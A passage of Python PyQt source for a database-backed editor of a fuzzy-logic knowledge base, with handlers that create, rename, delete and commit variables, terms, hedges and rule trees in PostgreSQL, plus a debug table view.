self.uiRangeMinEdit.text(), self.uiRangeMaxEdit.text()))\n variable_id = cur.fetchone()[0]\n self.uiVariablesCombo.setItemData(self.uiVariablesCombo.currentIndex(), variable_id)\n for i in range(0, self.uiTermsList.count()):\n cur.execute('INSERT INTO variables_terms (variable_id, term_id) VALUES (%s, %s);', \n (variable_id, self.uiTermsList.item(i).data(Qt.UserRole)))\n for j in range(0, self.uiHedgesList.count()):\n cur.execute('INSERT INTO variables_hedges (variable_id, hedge_id) VALUES (%s, %s);', \n (variable_id, self.uiHedgesList.item(j).data(Qt.UserRole)))\n self.conn.commit()\n cur.close()\n\n # Actions on terms tab\n\n def onTerm2Selected(self):\n if (self.uiTerms2Combo.isEditable() == True):\n return\n\n self.uiCommitTermButton.setEnabled(False)\n self.uiTermVerifiedCheck.setChecked(False)\n self.uiPointsEdit.clear()\n\n if (self.uiTerms2Combo.currentIndex() == -1):\n self.uiRenameTermButton.setEnabled(False)\n self.uiDeleteTermButton.setEnabled(False)\n self.uiTermVerifiedCheck.setEnabled(False)\n self.uiFunctionCombo.setCurrentIndex(-1)\n self.uiFunctionCombo.setEnabled(False)\n self.uiPointsEdit.setEnabled(False)\n return\n\n self.termRenamed = False\n\n if (self.uiTerms2Combo.currentData() != 0):\n self.uiFunctionCombo.blockSignals(True)\n cur = self.conn.cursor()\n cur.execute('SELECT functions.name FROM terms, functions WHERE functions.id = terms.function_id AND terms.id = %s;', \n (self.uiTerms2Combo.currentData(),))\n name = cur.fetchone()\n if (name):\n self.uiFunctionCombo.setCurrentText(name[0])\n else:\n self.uiFunctionCombo.setCurrentIndex(-1)\n self.uiFunctionCombo.blockSignals(False)\n\n cur = self.conn.cursor()\n cur.execute('SELECT points FROM terms WHERE id = %s;', (self.uiTerms2Combo.currentData(),))\n points = cur.fetchone()\n if (points):\n self.uiPointsEdit.setText('%s' % points[0])\n\n cur = self.conn.cursor()\n cur.execute('SELECT validated FROM terms WHERE id = %s;', (self.uiTerms2Combo.currentData(),))\n state = cur.fetchone()\n if (state[0] == True):\n self.uiTermVerifiedCheck.setChecked(True);\n\n self.uiRenameTermButton.setEnabled(True)\n self.uiDeleteTermButton.setEnabled(True)\n self.uiTermVerifiedCheck.setEnabled(True)\n self.uiPointsEdit.setEnabled(True)\n self.uiFunctionCombo.setEnabled(True)\n\n def onCreateTermClicked(self):\n self.currentTerm = -1\n self.uiTerms2Combo.setCurrentIndex(-1)\n self.uiTerms2Combo.setEditable(True)\n self.uiTerms2Combo.lineEdit().returnPressed.connect(self.onTermEntered)\n self.uiTerms2Combo.setFocus()\n self.uiCreateTermButton.setEnabled(False)\n\n def onRenameTermClicked(self):\n self.currentTerm = self.uiTerms2Combo.currentIndex()\n self.uiTerms2Combo.setEditable(True)\n self.uiTerms2Combo.lineEdit().returnPressed.connect(self.onTermEntered)\n self.uiTerms2Combo.setFocus()\n self.uiCreateTermButton.setEnabled(False)\n self.uiRenameTermButton.setEnabled(False)\n self.uiDeleteTermButton.setEnabled(False)\n\n def onTermEntered(self):\n self.termRenamed = False\n self.uiTerms2Combo.setEditable(False)\n self.uiCreateTermButton.setEnabled(True)\n self.uiRenameTermButton.setEnabled(True)\n self.uiDeleteTermButton.setEnabled(True)\n if (self.currentTerm >= 0):\n name = self.uiTerms2Combo.currentText()\n self.uiTerms2Combo.removeItem(self.uiTerms2Combo.currentIndex())\n if (self.uiTerms2Combo.itemText(self.currentTerm) != name):\n self.uiTerms2Combo.setItemText(self.currentTerm, name)\n self.termRenamed = True\n self.uiTerms2Combo.setCurrentIndex(self.currentTerm)\n self.checkPoints()\n else:\n 
self.uiTerms2Combo.setCurrentIndex(self.currentTerm)\n else:\n self.uiTerms2Combo.setItemData(self.uiTerms2Combo.currentIndex(), 0)\n self.onTerm2Selected()\n self.uiFunctionCombo.setFocus()\n\n def onDeleteTermClicked(self):\n cur = self.conn.cursor()\n cur.execute('DELETE FROM terms WHERE id = %s;', (self.uiTerms2Combo.currentData(),))\n self.conn.commit()\n cur.close()\n self.uiTerms2Combo.removeItem(self.uiTerms2Combo.currentIndex())\n\n def checkPoints(self):\n if (self.uiPointsEdit.text() != ''):\n self.uiCommitTermButton.setEnabled(True)\n else:\n self.uiCommitTermButton.setEnabled(False)\n\n def onTermVerified(self):\n self.checkPoints()\n\n def onFunctionSelected(self):\n if (self.uiFunctionCombo.currentIndex() != -1):\n self.checkPoints()\n\n def commitTerm(self):\n self.uiCommitTermButton.setEnabled(False)\n cur = self.conn.cursor()\n term_id = self.uiTerms2Combo.currentData()\n if (term_id):\n cur.execute('UPDATE terms SET validated = %s, function_id = %s, points = %s WHERE id = %s;', \n (self.uiTermVerifiedCheck.isChecked(), self.uiFunctionCombo.currentData(), \n self.uiPointsEdit.text(), term_id))\n if (self.termRenamed == True):\n cur.execute('UPDATE terms SET name = %s WHERE id = %s;', (self.uiTerms2Combo.currentText(), term_id))\n else:\n cur.execute('INSERT INTO groups (is_variable, is_term, is_hedge) VALUES (false, true, false) RETURNING id;')\n group_id = cur.fetchone()[0]\n for lemma in self.uiTerms2Combo.currentText().replace(' ', '').split(','):\n cur.execute('INSERT INTO synonims (group_id, lemma, grammemes, hits) VALUES (%s, %s, %s, 0);', \n (group_id, lemma, ''));\n cur.execute('INSERT INTO terms (validated, name, name_id, function_id, points) VALUES (%s, %s, %s, %s, %s) RETURNING id;', \n (self.uiTermVerifiedCheck.isChecked(), self.uiTerms2Combo.currentText(), \n group_id, self.uiFunctionCombo.currentData(), self.uiPointsEdit.text()))\n term_id = cur.fetchone()[0]\n self.uiTerms2Combo.setItemData(self.uiTerms2Combo.currentIndex(), term_id)\n self.conn.commit()\n cur.close()\n\n # Actions on hedges tab\n\n def onHedge2Selected(self):\n if (self.uiHedges2Combo.isEditable() == True):\n return\n\n self.uiCommitHedgeButton.setEnabled(False)\n self.uiHedgeVerifiedCheck.setChecked(False)\n self.uiResultEdit.clear()\n\n if (self.uiHedges2Combo.currentIndex() == -1):\n self.uiRenameHedgeButton.setEnabled(False)\n self.uiDeleteHedgeButton.setEnabled(False)\n self.uiHedgeVerifiedCheck.setEnabled(False)\n self.uiResultEdit.setEnabled(False)\n return\n\n self.hedgeRenamed = False\n\n if (self.uiHedges2Combo.currentData() != 0):\n cur = self.conn.cursor()\n cur.execute('SELECT result FROM hedges WHERE id = %s;', (self.uiHedges2Combo.currentData(),))\n result = cur.fetchone()\n if (result):\n self.uiResultEdit.setText('%s' % result[0])\n\n cur = self.conn.cursor()\n cur.execute('SELECT validated FROM hedges WHERE id = %s;', (self.uiHedges2Combo.currentData(),))\n state = cur.fetchone()\n if (state[0] == True):\n self.uiHedgeVerifiedCheck.setChecked(True);\n\n self.uiRenameHedgeButton.setEnabled(True)\n self.uiDeleteHedgeButton.setEnabled(True)\n self.uiHedgeVerifiedCheck.setEnabled(True)\n self.uiResultEdit.setEnabled(True)\n\n def onCreateHedgeClicked(self):\n self.currentHedge = -1\n self.uiHedges2Combo.setCurrentIndex(-1)\n self.uiHedges2Combo.setEditable(True)\n self.uiHedges2Combo.lineEdit().returnPressed.connect(self.onHedgeEntered)\n self.uiHedges2Combo.setFocus()\n self.uiCreateHedgeButton.setEnabled(False)\n\n def onRenameHedgeClicked(self):\n self.currentHedge = 
self.uiHedges2Combo.currentIndex()\n self.uiHedges2Combo.setEditable(True)\n self.uiHedges2Combo.lineEdit().returnPressed.connect(self.onHedgeEntered)\n self.uiHedges2Combo.setFocus()\n self.uiCreateHedgeButton.setEnabled(False)\n self.uiRenameHedgeButton.setEnabled(False)\n self.uiDeleteHedgeButton.setEnabled(False)\n\n def onHedgeEntered(self):\n self.hedgeRenamed = False\n self.uiHedges2Combo.setEditable(False)\n self.uiCreateHedgeButton.setEnabled(True)\n self.uiRenameHedgeButton.setEnabled(True)\n self.uiDeleteHedgeButton.setEnabled(True)\n if (self.currentHedge >= 0):\n name = self.uiHedges2Combo.currentText()\n self.uiHedges2Combo.removeItem(self.uiHedges2Combo.currentIndex())\n if (self.uiHedges2Combo.itemText(self.currentHedge) != name):\n self.uiHedges2Combo.setItemText(self.currentHedge, name)\n self.hedgeRenamed = True\n self.uiHedges2Combo.setCurrentIndex(self.currentHedge)\n self.checkResult()\n else:\n self.uiHedges2Combo.setCurrentIndex(self.currentHedge)\n else:\n self.uiHedges2Combo.setItemData(self.uiHedges2Combo.currentIndex(), 0)\n self.onHedge2Selected()\n self.uiResultEdit.setFocus()\n\n def onDeleteHedgeClicked(self):\n cur = self.conn.cursor()\n cur.execute('DELETE FROM hedges WHERE id = %s;', (self.uiHedges2Combo.currentData(),))\n self.conn.commit()\n cur.close()\n self.uiHedges2Combo.removeItem(self.uiHedges2Combo.currentIndex())\n\n def checkResult(self):\n if (self.uiResultEdit.text() != ''):\n self.uiCommitHedgeButton.setEnabled(True)\n else:\n self.uiCommitHedgeButton.setEnabled(False)\n\n def onHedgeVerified(self):\n self.checkResult()\n\n def commitHedge(self):\n self.uiCommitHedgeButton.setEnabled(False)\n cur = self.conn.cursor()\n hedge_id = self.uiHedges2Combo.currentData()\n if (hedge_id):\n cur.execute('UPDATE hedges SET validated = %s, result = %s WHERE id = %s;', \n (self.uiHedgeVerifiedCheck.isChecked(), self.uiResultEdit.text(), hedge_id))\n if (self.hedgeRenamed == True):\n cur.execute('UPDATE hedges SET name = %s WHERE id = %s;', (self.uiHedges2Combo.currentText(), hedge_id))\n else:\n cur.execute('INSERT INTO groups (is_variable, is_term, is_hedge) VALUES (false, false, true) RETURNING id;')\n group_id = cur.fetchone()[0]\n for lemma in self.uiHedges2Combo.currentText().replace(' ', '').split(','):\n cur.execute('INSERT INTO synonims (group_id, lemma, grammemes, hits) VALUES (%s, %s, %s, 0);', \n (group_id, lemma, ''));\n cur.execute('INSERT INTO hedges (validated, name, name_id, result) VALUES (%s, %s, %s, %s) RETURNING id;', \n (self.uiHedgeVerifiedCheck.isChecked(), self.uiHedges2Combo.currentText(), group_id, self.uiResultEdit.text()))\n hedge_id = cur.fetchone()[0]\n self.uiHedges2Combo.setItemData(self.uiHedges2Combo.currentIndex(), hedge_id)\n self.conn.commit()\n cur.close()\n\n # Actions on rules tab\n\n def loadTree(self, tree, name, rule_id):\n cur = self.conn.cursor()\n query = 'SELECT nodes.id, types.name FROM rules, nodes, types WHERE rules.%s_id = nodes.id' % name\n cur.execute(query + ' AND rules.id = %s AND types.id = nodes.type_id;', (rule_id,))\n root = cur.fetchone()\n cur.close()\n if (root):\n item = QTreeWidgetItem()\n item.setText(0, '(%s)' % root[1])\n item.setText(1, '%s' % root[0])\n tree.addTopLevelItem(item)\n cur = self.conn.cursor()\n cur.execute('SELECT nodes.id, nodes.parent_id, types.name, types.id FROM nodes, types, closures WHERE nodes.id = closures.descendant_id AND closures.ancestor_id = %s AND nodes.type_id = types.id AND nodes.parent_id IS NOT NULL ORDER BY nodes.parent_id ASC, types.id ASC;', 
(root[0],))\n nodes = cur.fetchall()\n cur.close()\n for node in nodes:\n if (node[2] in ('variable', 'term', 'hedge')):\n cur = self.conn.cursor()\n query = 'SELECT %ss.name_id, %ss.name FROM %ss, nodes WHERE %ss.id = nodes.%s_id' % (node[2], node[2], node[2], node[2], node[2])\n cur.execute(query + ' AND nodes.id = %s;', (node[0],))\n row = cur.fetchone()\n if (row[1] != ''):\n name = '(%s) ' % node[2] + row[1]\n else:\n name = '(%s) ' % node[2] + ', '.join(self.getLemmas(row[0])) \n cur.close()\n else:\n name = '(%s)' % node[2]\n parents = tree.findItems('%s' % node[1], Qt.MatchExactly | Qt.MatchRecursive, 1)\n item = QTreeWidgetItem()\n item.setText(0, '%s' % name)\n item.setText(1, '%s' % node[0])\n parents[0].addChild(item)\n\n def nodeToString(self, node):\n if not node:\n return '?'\n cur = self.conn.cursor()\n cur.execute('SELECT types.name FROM nodes, types WHERE nodes.type_id = types.id AND nodes.id = %s;', (node.text(1),))\n name = cur.fetchone()[0]\n cur.close()\n if (name in ('variable', 'term', 'hedge')):\n cur = self.conn.cursor()\n query = 'SELECT %ss.name_id, %ss.name FROM %ss, nodes WHERE %ss.id = nodes.%s_id' % (name, name, name, name, name)\n cur.execute(query + ' AND nodes.id = %s;', (node.text(1),))\n row = cur.fetchone()\n if (row[1] != ''):\n token = '\\'' + row[1] + '\\''\n else:\n token = '\\'' + ', '.join(self.getLemmas(row[0])) + '\\''\n cur.close()\n elif (name == 'variable_and'):\n token = '(%s)' % (self.nodeToString(node.child(0)))\n for i in range(node.childCount() - 1):\n token = '%s И (%s)' % (token, self.nodeToString(node.child(i + 1)))\n elif (name == 'variable_or'):\n token = '(%s)' % (self.nodeToString(node.child(0)))\n for i in range(node.childCount() - 1):\n token = '%s ИЛИ (%s)' % (token, self.nodeToString(node.child(i + 1)))\n elif (name == 'variable_value'):\n token = '%s ЕСТЬ %s' % (self.nodeToString(node.child(0)), self.nodeToString(node.child(1)))\n elif (name == 'term_complex'):\n token = '%s %s' % (self.nodeToString(node.child(0)), self.nodeToString(node.child(1)))\n else:\n token = ''\n return token\n\n def onRuleSelected(self):\n if (self.uiRulesCombo.isEditable() == True):\n return\n\n self.uiCommitRuleButton.setEnabled(False)\n self.uiNoteEdit.clear()\n self.uiNoteEdit.setEnabled(False)\n self.uiRuleVerifiedCheck.setChecked(False)\n self.uiAntecedentTree.clear()\n self.uiAntecedentEdit.clear()\n self.uiAntecedentEdit.setEnabled(False)\n self.uiConsequentTree.clear()\n self.uiConsequentEdit.clear()\n self.uiConsequentEdit.setEnabled(False)\n\n if (self.uiRulesCombo.currentIndex() == -1):\n self.uiRenameRuleButton.setEnabled(False)\n self.uiDeleteRuleButton.setEnabled(False)\n self.uiRuleVerifiedCheck.setEnabled(False)\n self.uiAntecedentNodeTypesCombo.setEnabled(False)\n self.uiAntecedentNodesCombo.setEnabled(False)\n self.uiAddAntecedentNodeButton.setEnabled(False)\n self.uiRemoveAntecedentNodeButton.setEnabled(False)\n self.uiAntecedentTree.setEnabled(False)\n self.uiConsequentNodeTypesCombo.setEnabled(False)\n self.uiConsequentNodesCombo.setEnabled(False)\n self.uiAddConsequentNodeButton.setEnabled(False)\n self.uiRemoveConsequentNodeButton.setEnabled(False)\n self.uiConsequentTree.setEnabled(False)\n return\n\n if (self.uiRulesCombo.currentData() != 0):\n cur = self.conn.cursor()\n cur.execute('SELECT validated, note FROM rules WHERE id = %s;', (self.uiRulesCombo.currentData(),))\n data = cur.fetchone()\n\n if (data[0] == True):\n self.uiRuleVerifiedCheck.setChecked(True);\n\n self.uiNoteEdit.setText(data[1])\n\n 
self.loadTree(self.uiAntecedentTree, 'antecedent', self.uiRulesCombo.currentData())\n if self.uiAntecedentTree.topLevelItemCount() > 0:\n self.uiAntecedentTree.setCurrentItem(self.uiAntecedentTree.topLevelItem(0))\n self.loadTree(self.uiConsequentTree, 'consequent', self.uiRulesCombo.currentData())\n if self.uiConsequentTree.topLevelItemCount() > 0:\n self.uiConsequentTree.setCurrentItem(self.uiConsequentTree.topLevelItem(0))\n else:\n self.uiRuleVerifiedCheck.setChecked(False);\n\n self.onAntecedentNodeSelected()\n self.onConsequentNodeSelected()\n\n self.uiRenameRuleButton.setEnabled(True)\n self.uiDeleteRuleButton.setEnabled(True)\n self.uiRuleVerifiedCheck.setEnabled(True)\n self.uiNoteEdit.setEnabled(True)\n self.uiAntecedentTree.setEnabled(True)\n self.uiConsequentTree.setEnabled(True)\n\n def onCreateRuleClicked(self):\n self.currentRule = -1\n self.uiRulesCombo.setCurrentIndex(-1)\n self.uiRulesCombo.setEditable(True)\n self.uiRulesCombo.lineEdit().returnPressed.connect(self.onRuleEntered)\n self.uiRulesCombo.setFocus()\n self.uiCreateRuleButton.setEnabled(False)\n\n def onRenameRuleClicked(self):\n self.currentRule = self.uiRulesCombo.currentIndex()\n self.uiRulesCombo.setEditable(True)\n self.uiRulesCombo.lineEdit().returnPressed.connect(self.onRuleEntered)\n self.uiRulesCombo.setFocus()\n self.uiCreateRuleButton.setEnabled(False)\n self.uiRenameRuleButton.setEnabled(False)\n self.uiDeleteRuleButton.setEnabled(False)\n\n def onRuleEntered(self):\n self.uiRulesCombo.setEditable(False)\n self.uiCreateRuleButton.setEnabled(True)\n self.uiRenameRuleButton.setEnabled(True)\n self.uiDeleteRuleButton.setEnabled(True)\n if (self.currentRule >= 0):\n name = self.uiRulesCombo.currentText()\n self.uiRulesCombo.removeItem(self.uiRulesCombo.currentIndex())\n if (self.uiRulesCombo.itemText(self.currentRule) != name):\n self.uiRulesCombo.setItemText(self.currentRule, name)\n self.uiRulesCombo.setCurrentIndex(self.currentRule)\n self.uiCommitRuleButton.setEnabled(True)\n else:\n self.uiRulesCombo.setCurrentIndex(self.currentRule)\n else:\n self.uiRulesCombo.setItemData(self.uiRulesCombo.currentIndex(), 0)\n self.onRuleSelected()\n\n def onDeleteRuleClicked(self):\n cur = self.conn.cursor()\n if self.uiAntecedentTree.topLevelItemCount() > 0:\n cur.execute('DELETE FROM nodes WHERE id = %s;', (self.uiAntecedentTree.topLevelItem(0).text(1),))\n if self.uiConsequentTree.topLevelItemCount() > 0:\n cur.execute('DELETE FROM nodes WHERE id = %s;', (self.uiConsequentTree.topLevelItem(0).text(1),))\n if self.uiRulesCombo.currentData() != 0:\n cur.execute('DELETE FROM rules WHERE id = %s;', (self.uiRulesCombo.currentData(),))\n self.conn.commit()\n cur.close()\n self.uiRulesCombo.blockSignals(True)\n self.uiRulesCombo.removeItem(self.uiRulesCombo.currentIndex())\n self.uiRulesCombo.setCurrentIndex(-1)\n self.uiRulesCombo.blockSignals(False)\n self.onRuleSelected()\n\n def findParent(self, node):\n parent = node.parent()\n while True:\n parent_type = self.nodeType(parent)\n if parent_type == 'variable_value':\n break\n parent = parent.parent()\n return parent.child(0).text(1)\n\n def fillComboWithValues(self, combo, node, type_name):\n name = self.nodeType(node)\n cur = self.conn.cursor()\n combo.blockSignals(True)\n combo.clear()\n if type_name == 'variable':\n cur.execute('SELECT id, name FROM variables;')\n elif type_name == 'term':\n if name == 'variable_value':\n node_id = node.child(0).text(1)\n elif name in ('term_complex', 'term_and', 'term_or'):\n node_id = self.findParent(node)\n 
cur.execute('SELECT terms.id, terms.name FROM nodes, variables_terms, terms WHERE nodes.id = %s AND variables_terms.variable_id = nodes.variable_id AND terms.id = variables_terms.term_id;', (node_id,))\n elif type_name == 'hedge':\n node_id = self.findParent(node)\n cur.execute('SELECT hedges.id, hedges.name FROM nodes, variables_hedges, hedges WHERE nodes.id = %s AND variables_hedges.variable_id = nodes.variable_id AND hedges.id = variables_hedges.hedge_id;', (node_id,))\n for row in cur.fetchall():\n combo.addItem(row[1], row[0])\n combo.setCurrentIndex(-1)\n combo.blockSignals(False)\n cur.close()\n\n def onAntecedentNodeTypeSelected(self):\n self.uiAntecedentNodesCombo.clear()\n self.uiAntecedentNodesCombo.setEnabled(False)\n if (self.uiAntecedentNodeTypesCombo.currentIndex() == -1):\n return\n self.uiAntecedentNodesCombo.blockSignals(True)\n if (self.uiAntecedentNodeTypesCombo.currentText() in ('variable', 'term', 'hedge')):\n self.fillComboWithValues(self.uiAntecedentNodesCombo, self.uiAntecedentTree.currentItem(),\n self.uiAntecedentNodeTypesCombo.currentText())\n self.uiAntecedentNodesCombo.setEnabled(True)\n self.uiAddAntecedentNodeButton.setEnabled(False)\n else:\n self.uiAddAntecedentNodeButton.setEnabled(True)\n self.uiAntecedentNodesCombo.blockSignals(False)\n\n def onAntecedentNodeValueSelected(self):\n if (self.uiAntecedentNodesCombo.currentIndex() != -1):\n self.uiAddAntecedentNodeButton.setEnabled(True)\n\n def addNode(self, tree, nodesCombo, nodeTypesCombo, addNodeButton, removeNodeButton, edit):\n parent_id = None\n variable_id = None\n term_id = None\n hedge_id = None\n if (tree.currentItem()):\n parent_id = tree.currentItem().text(1)\n if (nodeTypesCombo.currentText() == 'variable'):\n variable_id = nodesCombo.currentData()\n elif (nodeTypesCombo.currentText() == 'term'):\n term_id = nodesCombo.currentData()\n elif (nodeTypesCombo.currentText() == 'hedge'):\n hedge_id = nodesCombo.currentData()\n cur = self.conn.cursor()\n cur.execute('INSERT INTO nodes (parent_id, type_id, variable_id, term_id, hedge_id) VALUES (%s, %s, %s, %s, %s) RETURNING id;', (parent_id, nodeTypesCombo.currentData(), variable_id, term_id, hedge_id))\n node_id = cur.fetchone()[0]\n self.conn.commit()\n cur.close()\n item = QTreeWidgetItem()\n if (nodesCombo.isEnabled()):\n item.setText(0, '(%s) %s' % (nodeTypesCombo.currentText(), nodesCombo.currentText()))\n else:\n item.setText(0, '(%s)' % nodeTypesCombo.currentText())\n item.setText(1, '%s' % node_id)\n if (tree.currentItem()):\n tree.currentItem().addChild(item)\n else:\n tree.addTopLevelItem(item)\n tree.setCurrentItem(item)\n item.setExpanded(True)\n self.onNodeSelected(tree, nodeTypesCombo, nodesCombo, addNodeButton, removeNodeButton, edit)\n\n def onAddAntecedentNodeClicked(self):\n self.addNode(self.uiAntecedentTree, self.uiAntecedentNodesCombo, self.uiAntecedentNodeTypesCombo, \n self.uiAddAntecedentNodeButton, self.uiRemoveAntecedentNodeButton, self.uiAntecedentEdit)\n self.uiCommitRuleButton.setEnabled(True)\n \n def nodeType(self, node):\n cur = self.conn.cursor()\n cur.execute('SELECT types.name FROM nodes, types WHERE nodes.type_id = types.id AND nodes.id = %s;', (node.text(1),))\n name = cur.fetchone()[0]\n cur.close()\n return name\n\n def fillNodeTypesCombo(self, node, combo):\n combo.blockSignals(True)\n combo.clear()\n if node != None:\n name = self.nodeType(node)\n if name in ('variable', 'term', 'hedge'):\n combo.setEnabled(False)\n elif name == 'term_complex':\n if (node.childCount() == 0):\n combo.addItem('hedge', 2)\n 
combo.setEnabled(True)\n elif (node.childCount() == 1):\n combo.addItem('term', 3)\n combo.addItem('term_complex', 4)\n combo.addItem('term_and', 6)\n combo.addItem('term_or', 7)\n combo.setEnabled(True)\n else:\n combo.setEnabled(False)\n elif name == 'variable_value':\n if (node.childCount() == 0):\n combo.addItem('variable', 1)\n combo.setEnabled(True)\n elif (node.childCount() == 1):\n combo.addItem('term', 3)\n combo.addItem('term_complex', 4)\n combo.addItem('term_and', 6)\n combo.addItem('term_or', 7)\n combo.setEnabled(True)\n else:\n combo.setEnabled(False)\n elif name == 'term_and' or name == 'term_or':\n combo.addItem('term', 3)\n combo.addItem('term_complex', 4)\n combo.setEnabled(True)\n elif name == 'variable_and' or name == 'variable_or':\n combo.addItem('variable_value', 5)\n combo.setEnabled(True)\n else:\n combo.addItem('variable_value', 5)\n combo.addItem('variable_and', 8)\n combo.addItem('variable_or', 9)\n combo.setEnabled(True)\n combo.setCurrentIndex(-1)\n combo.blockSignals(False)\n\n def onNodeSelected(self, tree, nodeTypesCombo, nodesCombo, addNodeButton, removeNodeButton, edit):\n node = tree.currentItem()\n self.fillNodeTypesCombo(node, nodeTypesCombo)\n nodesCombo.blockSignals(True)\n nodesCombo.clear()\n nodesCombo.setCurrentIndex(-1)\n nodesCombo.setEnabled(False)\n nodesCombo.blockSignals(False)\n addNodeButton.setEnabled(False)\n if node != None:\n name = self.nodeType(node)\n if name == 'variable' and node.parent().childCount() > 1:\n removeNodeButton.setEnabled(False)\n else:\n removeNodeButton.setEnabled(True)\n edit.setEnabled(True)\n edit.setText(self.nodeToString(node))\n else:\n edit.setEnabled(False)\n edit.clear()\n\n def onAntecedentNodeSelected(self):\n self.onNodeSelected(self.uiAntecedentTree, self.uiAntecedentNodeTypesCombo, self.uiAntecedentNodesCombo, \n self.uiAddAntecedentNodeButton, self.uiRemoveAntecedentNodeButton, self.uiAntecedentEdit)\n\n def onRemoveAntecedentNodeClicked(self):\n current = self.uiAntecedentTree.currentItem()\n cur = self.conn.cursor()\n cur.execute('DELETE FROM nodes WHERE id = %s;', (current.text(1),))\n self.conn.commit()\n cur.close()\n if (current.parent()):\n current.parent().takeChild(current.parent().indexOfChild(current))\n else:\n self.uiAntecedentTree.takeTopLevelItem(self.uiAntecedentTree.indexOfTopLevelItem(current))\n if (self.uiAntecedentTree.topLevelItemCount() == 0):\n self.uiRemoveAntecedentNodeButton.setEnabled(False)\n self.uiAddAntecedentNodeButton.setEnabled(False)\n else:\n self.uiCommitRuleButton.setEnabled(True)\n self.onAntecedentNodeSelected()\n\n def onConsequentNodeTypeSelected(self):\n self.uiConsequentNodesCombo.clear()\n self.uiConsequentNodesCombo.setEnabled(False)\n if (self.uiConsequentNodeTypesCombo.currentIndex() == -1):\n return\n self.uiConsequentNodesCombo.blockSignals(True)\n if (self.uiConsequentNodeTypesCombo.currentText() in ('variable', 'term', 'hedge')):\n self.fillComboWithValues(self.uiConsequentNodesCombo, self.uiConsequentTree.currentItem(),\n self.uiConsequentNodeTypesCombo.currentText())\n self.uiConsequentNodesCombo.setEnabled(True)\n self.uiAddConsequentNodeButton.setEnabled(False)\n else:\n self.uiAddConsequentNodeButton.setEnabled(True)\n self.uiConsequentNodesCombo.blockSignals(False)\n\n def onConsequentNodeValueSelected(self):\n if (self.uiConsequentNodesCombo.currentIndex() != -1):\n self.uiAddConsequentNodeButton.setEnabled(True)\n\n def onAddConsequentNodeClicked(self):\n self.addNode(self.uiConsequentTree, self.uiConsequentNodesCombo, 
self.uiConsequentNodeTypesCombo, \n self.uiAddConsequentNodeButton, self.uiRemoveConsequentNodeButton, self.uiConsequentEdit)\n self.uiCommitRuleButton.setEnabled(True)\n\n def onConsequentNodeSelected(self):\n self.onNodeSelected(self.uiConsequentTree, self.uiConsequentNodeTypesCombo, self.uiConsequentNodesCombo, \n self.uiAddConsequentNodeButton, self.uiRemoveConsequentNodeButton, self.uiConsequentEdit)\n\n def onRemoveConsequentNodeClicked(self):\n current = self.uiConsequentTree.currentItem()\n cur = self.conn.cursor()\n cur.execute('DELETE FROM nodes WHERE id = %s;', (current.text(1),))\n self.conn.commit()\n cur.close()\n if (current.parent()):\n current.parent().takeChild(current.parent().indexOfChild(current))\n else:\n self.uiConsequentTree.takeTopLevelItem(self.uiConsequentTree.indexOfTopLevelItem(current))\n if (self.uiConsequentTree.topLevelItemCount() == 0):\n self.uiRemoveConsequentNodeButton.setEnabled(False)\n self.uiAddConsequentNodeButton.setEnabled(False)\n else:\n self.uiCommitRuleButton.setEnabled(True)\n self.onConsequentNodeSelected()\n\n def onRuleVerified(self):\n self.uiCommitRuleButton.setEnabled(True)\n\n def onNoteEdited(self):\n if self.uiAntecedentTree.topLevelItemCount() != 0 and self.uiConsequentTree.topLevelItemCount() != 0:\n self.uiCommitRuleButton.setEnabled(True)\n\n def walkTree(self, root, cur):\n self.walkNodes(root, root, cur)\n for i in range(root.childCount()):\n self.walkTree(root.child(i), cur)\n\n def walkNodes(self, root, node, cur):\n cur.execute('SELECT * FROM closures WHERE ancestor_id = %s AND descendant_id = %s LIMIT 1;', (root.text(1), node.text(1)))\n if not cur.fetchone():\n cur.execute('INSERT INTO closures (ancestor_id, descendant_id) VALUES (%s, %s);', (root.text(1), node.text(1)))\n for i in range(node.childCount()):\n self.walkNodes(root, node.child(i), cur)\n\n def commitRule(self):\n self.uiCommitRuleButton.setEnabled(False)\n cur = self.conn.cursor()\n self.walkTree(self.uiAntecedentTree.topLevelItem(0), cur) \n self.walkTree(self.uiConsequentTree.topLevelItem(0), cur) \n rule_id = self.uiRulesCombo.currentData()\n if (rule_id):\n cur.execute('UPDATE rules SET validated = %s, name = %s, note = %s, antecedent_id = %s, consequent_id = %s WHERE id = %s;', \n (self.uiRuleVerifiedCheck.isChecked(), self.uiRulesCombo.currentText(), self.uiNoteEdit.text(),\n self.uiAntecedentTree.topLevelItem(0).text(1), self.uiConsequentTree.topLevelItem(0).text(1), rule_id))\n else:\n cur.execute('INSERT INTO rules (validated, name, note, antecedent_id, consequent_id) VALUES (%s, %s, %s, %s, %s) RETURNING id;', \n (self.uiRuleVerifiedCheck.isChecked(), self.uiRulesCombo.currentText(), self.uiNoteEdit.text(), \n self.uiAntecedentTree.topLevelItem(0).text(1), self.uiConsequentTree.topLevelItem(0).text(1)))\n rule_id = cur.fetchone()[0]\n self.uiRulesCombo.setItemData(self.uiRulesCombo.currentIndex(), rule_id)\n self.conn.commit()\n cur.close()\n\n # Actions on debug tab\n\n def fillTable(self, query):\n cur = self.conn.cursor()\n cur.execute(query)\n rows = cur.fetchall()\n self.uiDataTable.clear()\n self.uiDataTable.setRowCount(cur.rowcount)\n self.uiDataTable.setColumnCount(len(cur.description))\n self.uiDataTable.setHorizontalHeaderLabels([desc[0] for desc in cur.description])\n self.uiDataTable.setSortingEnabled(False)\n i = 0\n for row in rows:\n for j in range(0, len(row)):\n item = QTableWidgetItem('%s' % row[j])\n self.uiDataTable.setItem(i, j, item)\n i += 1\n cur.close()\n self.uiDataTable.setSortingEnabled(True)\n 
self.uiDataTable.setEnabled(True)\n\n def onModeSelected(self):\n if (self.uiModeCombo.currentData() == 0):\n self.fillTable('SELECT variables.id, variables.name, variables.name_id, variables.min, variables.max, variables.validated FROM variables;')\n elif (self.uiModeCombo.currentData() == 1):\n self.fillTable('SELECT terms.id, terms.name, terms.name_id, functions.name, terms.points, terms.validated FROM terms, functions WHERE terms.function_id = functions.id;')\n elif (self.uiModeCombo.currentData() == 2):\n self.fillTable('SELECT hedges.id, hedges.name, hedges.name_id, hedges.result, hedges.validated FROM hedges;')\n elif (self.uiModeCombo.currentData() == 3):\n self.fillTable('SELECT variables.id, variables.name, variables.name_id, variables.min, variables.max, variables.validated, terms.id, terms.name, terms.name_id, functions.name, terms.points, terms.validated FROM variables, terms, functions, variables_terms WHERE variables.id = variables_terms.variable_id AND terms.id = variables_terms.term_id AND terms.function_id = functions.id;')\n elif (self.uiModeCombo.currentData() == 4):\n self.fillTable('SELECT variables.id, variables.name, variables.name_id, variables.min, variables.max, 